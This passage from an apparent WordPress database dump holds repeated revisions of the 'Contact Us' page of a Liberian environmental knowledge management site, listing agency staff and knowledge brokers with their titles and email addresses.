loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:43:06','2021-01-22 11:43:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3426,42,'2021-01-22 11:47:57','2021-01-22 11:47:57','','','','inherit','open','closed','','bgoll','','','2021-01-22 11:48:26','2021-01-22 11:48:26','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg',0,'attachment','image/jpeg',0),(3427,42,'2021-01-22 11:48:37','2021-01-22 11:48:37','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:48:37','2021-01-22 11:48:37','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3428,42,'2021-01-22 11:48:38','2021-01-22 11:48:38','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:48:38','2021-01-22 11:48:38','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3429,42,'2021-01-22 11:48:38','2021-01-22 11:48:38','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, 